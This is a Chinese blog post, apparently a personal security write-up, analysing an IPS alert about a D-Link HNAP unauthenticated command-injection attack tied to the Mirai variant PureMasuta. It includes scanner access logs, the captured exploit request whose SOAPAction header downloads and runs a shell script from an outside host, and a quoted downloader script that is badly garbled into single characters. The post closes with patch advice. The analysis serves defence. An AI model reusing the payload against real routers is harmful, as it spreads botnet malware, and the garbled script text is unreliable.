20230630跟着IPS学信息安全6-DLink HNAP未授权漏洞攻击(Mirai僵尸网络Botnet变种-PureMasuta)
你们这几个IP都拿到了,别在gongji了;
23.225.180.204 - - [12/Jan/2023 03:38:55] “GET /sitemap.xml HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET / HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /HNAP1/ HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /hudson/script HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /script HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /sqlite/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /sqlitemanager/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /SQLiteManager/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /SQLite/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /SQlite/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /SQLiteManager-1.2.4/main.php HTTP/1.1” 404 -
111.224.145.89 - - [12/Jan/2023 04:19:14] “GET /agSearch/SQlite/main.php HTTP/1.1” 404 -
220.196.160.144 - - [12/Jan/2023 04:21:01] “GET /hudson/script HTTP/1.1” 404 -
180.101.245.248 - - [12/Jan/2023 04:21:22] “GET /main.php HTTP/1.1” 404 -
180.101.244.13 - - [12/Jan/2023 04:22:17] “GET /SQlite/main.php HTTP/1.1” 404 -
180.101.244.16 - - [12/Jan/2023 04:24:12] “GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1” 404 -
220.196.160.144 - - [12/Jan/2023 04:24:50] “GET / HTTP/1.1” 404 -
220.196.160.96 - - [12/Jan/2023 04:24:53] “GET /HNAP1/ HTTP/1.1” 404 -
180.101.245.252 - - [12/Jan/2023 04:27:48] “GET /sqlite/main.php HTTP/1.1” 404 -
87.236.176.130 - - [12/Jan/2023 07:47:36] “GET / HTTP/1.1” 404 -
180.101.245.249 - - [12/Jan/2023 08:20:13] “GET /SQLiteManager-1.2.4/main.php HTTP/1.1” 404 -
————————————————
1.purenetworks
2.HNAP协议
3.DLink漏洞
4.本次攻击分析
5.漏洞修补建议
6.结论
7.补充:IoT和Mirai僵尸网络变种-PureMasuta
IPS出现新的报警信息
explanation:
protocol: tcp
analysis: content
malware-detected:
malware (name:Exploit.IoT.HNAP1):
stype: bot-command
sid: ---------
cnc-services:
cnc-service:
type: SignatureMatch
sname: Exploit.IoT.HNAP1
protocol: tcp
port: 80
sid: -----------
url: hxxp:///HNAP1/
address: xxx.xxx.xxx.xxx.xxx
channel: POST /HNAP1/ HTTP/1.1::
~~Host: xxx.xxx.xxx.xxx.xxx:80::
~~User-Agent: Mozila/5.0::
~~Accept-Encoding: gzip, deflate::
~~Accept: /::~~Connection: keep-alive::
SOAPAction: “http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp && export PATH=$PATH:. && cd /tmp; wget http://45.95.55.xxx/a/wget.sh; chmod 777 wget.sh; sh wget.sh selfrep.dlink; rm -rf wget.sh”::Content-Length: 0::::
1.purenetworks
首先看看http://purenetworks.com是什么
思科1.2亿美元收购Pure Networks软件公司
PureNetworks为一家家庭网络管理软件和工具供应商,它的家庭网络管理解决方案允许用户搭建和管理家庭网络,在家中连接一系列设备、应用和服务等。2008年被思科收购。
2.HNAP协议
HNAP - Router Security
HNAP, or the Home Network Administration Protocol, is a network device management protocol dating back to 2007. Cisco, took over the protocol from Pure Networks in 2008. It allows network devices (routers, NAS devices, network cameras, etc.) to be silently managed and administered. This lets someone or something malicious make changes such as adding port forwarding to a router.
HNAP是由Pure Networks开发的协议,后续由Cisco管理与开发。
HNAP用于网络设备之间的交互,该协议基于SOAP和HTTP,以post的方式发包。
3.DLink缓冲区漏洞
主流IoT品牌DLink路由器在LAN接口上使用HNAP协议。这是一种允许识别,配置和管理网络设备的SOAP协议。DLink使用这个协议来实现通过LAN口与路由器的WAN口进行通信。
DLink产品使用HNAP协议,有不少API函数存在命令注入漏洞和缓冲区漏洞。
网上有很多来自Craig Heffner的报告反应DLink漏洞。基本都是很久以前的信息了。
Files from Craig Heffner ≈ Packet Storm (packetstormsecurity.com)
4.本次攻击分析
HTTP协议中使用了Soapaction来处理HNAP请求,在HTTP header中加入SOAPaction,该字段中会指明请求的操作。
本次攻击的payload如下
channel: POST /HNAP1/ HTTP/1.1::
~~Host: xxx.xxx.xxx.xxx.xxx:80::
~~User-Agent: Mozila/5.0::
~~Accept-Encoding: gzip, deflate::
~~Accept: /::~~Connection: keep-alive::
SOAPAction: “http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp && export PATH=$PATH:. && cd /tmp; wget http://45.95.55.xxx/a/wget.sh; chmod 777 wget.sh; sh wget.sh selfrep.dlink; rm -rf wget.sh”::Content-Length: 0::::
查了网上,利用漏洞,SOAPaction头部包含http://purenetworks.com/HNAP1/GetDeviceSettings的话,就没有了认证检测,制作成一个可以绕过验证的SOAP查询。
如果DLink路由器远程管理功能被启用的话,HNAP请求就可以通过WAN使远程漏洞利用成为现实。后面的SOAPaction就会被执行。
类似可能通过HNAP接口被攻击者利用的敏感函数还有
• GetClientInfo
• SetWanSettings
• SetFactoryDefault
• SetWLanRadioSettings
• SetWanSettings
后续攻击代码大致包含内容是,进入tmp目录,然后从http://45.95.55.xxx下载wget.sh,再执行wget.sh,此时要送入参数selfrep.dlink。
虽然不知道wget.sh脚本是怎么样的,但是网上可以找到类似的参考
$ curl -v http://yy.yy.yy.yy
- Trying yy.yy.yy.yy…
- TCP_NODELAY set
- Connected to yy.yy.yy.yy (yy.yy.yy.yy) port 80 (#0)
GET /dlink HTTP/1.1
Host: yy.yy.yy.yy
User-Agent: curl/7.58.0
Accept: /
< HTTP/1.1 200 OK
< Date:
< Server: Apache/2.4.10 (Debian)
< Last-Modified:
< ETag: W/“10e-571b41599b480”
< Accept-Ranges: bytes
< Content-Length: 270
<
#!/bin/sh
n=“mips.gemini mpsl.gemini arm7.gemini”
http_server=“yy.yy.yy.yy”
for a in
n
d
o
c
d
/
t
m
p
w
g
e
t
h
t
t
p
:
/
/
n do cd /tmp wget http://
ndocd/tmpwgethttp://http_server/
a
−
O
−
>
/
t
m
p
/
a -O -> /tmp/
a−O−>/tmp/a
chmod 777 /tmp/
a
/
t
m
p
/
a /tmp/
a/tmp/a selfrep.dlink
done
for a in n d o r m − r f / t m p / n do rm -rf /tmp/ ndorm−rf/tmp/a
- Connection #0 to host yy.yy.yy.yy left intact
done
大概就是不停的自我复制攻击者指定的文件(一般是蠕虫病毒)吧。
5.漏洞修补建议
D-Link路由器HNAP协议系列漏洞披露 – 奇安信技术研究院 (qianxin.com)
• 开启HNAP接口的登陆认证,尤其需要保护针对敏感功能函数的远程使用;
• HNAP协议在管理设备时,需要经常调用系统shell执行命令,在使用外部输入作为命令输入参
数时,可以通过黑名单的方式过滤掉参数中存在的当前设备支持的shell命令。
个人用户应该及时通过官方网站下载更新固件或者登陆路由器管理界面进行版本自动更新,确保固件升级到最新版本。
6.结论
HNAP作为一种运行于HTTP上的网络设备管理协议,广泛应用于各类中小型网络设备中,然而该协议却屡次暴露出严重的安全问题,其根本原因还是在于厂商实现协议时没有遵循基本的软件安全开发与设计规范。
近年在物联网的迅速兴起下,网络设备的低成本、功能快速迭代需求导致厂商往往更加无暇顾及安全问题,在奇安信披露的安全漏洞中可以看出,该协议在主流路由器厂商的实现中仍然存在大量高危安全漏洞,其中部分高危漏洞利用条件非常低,结合DNS Rebinding等利用方法,极容易被用于大范围钓鱼攻击,控制大量终端形成僵尸网络,大范围影响互联网安全。
我的网络里面没有相关设备,所以不需要关注这个IPS警告。
7.补充:IoT和Mirai僵尸网络变种-PureMasuta
在“万物互联”的背景下,IoT设备应用日益流行,也频繁爆出高危安全漏洞。致瘫北美大半个网络DNS服务的Mirai僵尸网络(Mirai Botnet)就是其中之一。
本次攻击注入代码是Mirai的变种之一–PureMasuta。
盘点迄今为止Mirai的7大变种
扫一扫
1104
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
